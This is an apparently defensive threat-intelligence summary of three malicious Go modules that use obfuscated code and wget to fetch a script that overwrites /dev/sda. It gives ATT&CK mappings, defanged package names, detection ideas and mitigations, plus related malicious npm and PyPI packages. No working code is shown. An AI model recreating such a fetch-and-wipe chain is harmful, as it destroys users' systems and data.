Full Report
Cybersecurity researchers have discovered three malicious Go modules that include obfuscated code to fetch next-stage payloads that can irrevocably overwrite a Linux system's primary disk and render it unbootable. The names of the packages are listed below - github[.]com/truthfulpharm/prototransform github[.]com/blankloggia/go-mcp github[.]com/steelpoor/tlsproxy "Despite appearing legitimate,
Analysis Summary
# Tool/Technique: Malicious Go Modules (Disk-Wiping Payload Delivery)
## Overview
This entry summarizes a supply chain attack involving three malicious Go modules discovered designed to fetch and execute a destructive payload on compromised Linux systems. The ultimate goal of the final payload is to irrevocably overwrite the system's primary disk, rendering it unbootable.
## Technical Details
- Type: Malware/Attack Chain (Delivery Mechanism via Dependency Confusion/Supply Chain)
- Platform: Linux
- Capabilities: Delivery of obfuscated initial payload, environment checks (OS detection), fetching secondary destructive payload using `wget`, and execution of disk-wiping script.
- First Seen: Leading up to May 03, 2025 (Date of article publication)
## MITRE ATT&CK Mapping
The primary focus is on the initial compromise via the software supply chain and the subsequent execution of destructive actions.
- **TA0001 - Initial Access**
- T1195 - Supply Chain Compromise
- T1195.002 - Compromise Software Supply Chain
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
- **TA0004 - Privilege Escalation** (Implied, needed to write to disk)
- **TA0009 - Collection** (Not explicitly detailed, but environment checking occurs)
- **TA0010 - Exfiltration** (Not detailed, focus is destruction)
- **TA0012 - Impact**
- T1485 - Data Destruction
## Functionality
### Core Capabilities
- **Package Distribution:** Distributed via Go module repositories under seemingly benign names.
- **Obfuscation:** Initial code within the modules is highly obfuscated to hide malicious intent.
- **OS Check:** Modules specifically check if the running environment is Linux.
- **Payload Retrieval:** Utilizes `wget` to fetch a secondary, destructive payload from a remote server.
### Advanced Features
- **Irreversible Disk Overwrite:** The secondary payload is a shell script designed to overwrite the entire primary disk (`/dev/sda`) with zeroes. This action specifically aims to defeat data recovery and forensic inspection by permanently sanitizing the storage medium.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context]
- Registry Keys: [Not applicable for Linux primary focus]
- Network Indicators: Connection established to a remote server for payload download via `wget`. Specific C2 details are not provided, only the method (`wget`).
- Behavioral Indicators:
- Execution of Go binaries incorporating obfuscated code.
- Use of `wget` immediately following execution, pointed at a remote source.
- Execution of shell scripts that attempt to write directly to block devices (e.g., `/dev/sda`).
## Associated Threat Actors
- The specific threat actor group is **not named** in the article snippet, but the activity is attributed to actors conducting advanced supply chain attacks.
## Detection Methods
- **Signature-based detection:** Detecting known malicious Go module checksums or the specific package names during dependency resolution.
- **Behavioral detection:** Monitoring for downloaded binaries that immediately execute shell scripts targeting physical devices like `/dev/sda`. Monitoring for the execution chain: Go module $\rightarrow$ `wget` $\rightarrow$ Shell script execution.
- **YARA rules if available:** [Not provided in the context]
## Mitigation Strategies
- **Prevention measures:** Strict vetting and auditing of third-party dependencies, especially in supply chain environments (e.g., using software composition analysis tools). Prefer locking dependencies to specific versions rather than allowing broad updates.
- **Hardening recommendations:** Implementing strict control over which network endpoints applications can connect to (network segmentation/allow-listing). Ensuring appropriate filesystem permissions to prevent writing directly to raw devices unless necessary and explicitly authorized by system administration processes.
## Related Tools/Techniques
The article mentions other contemporaneous supply chain campaigns:
- **Malicious npm packages:** Packages like `crypto-encrypt-ts`, `react-native-scrollpageviewtest`, and numerous packages appended with `-paypal` that steal crypto wallet data.
- **Malicious PyPI packages:** `web3x` and `herewalletbot` (crypto credential theft).
- **PyPI packages using Gmail:** Seven packages leveraging Gmail SMTP and WebSockets for C2 and data exfiltration (e.g., `cfc-bsb`, `coffin2022`).
The malicious Go modules leveraged are:
- `github[.]com/truthfulpharm/prototransform`
- `github[.]com/blankloggia/go-mcp`
- `github[.]com/steelpoor/tlsproxy`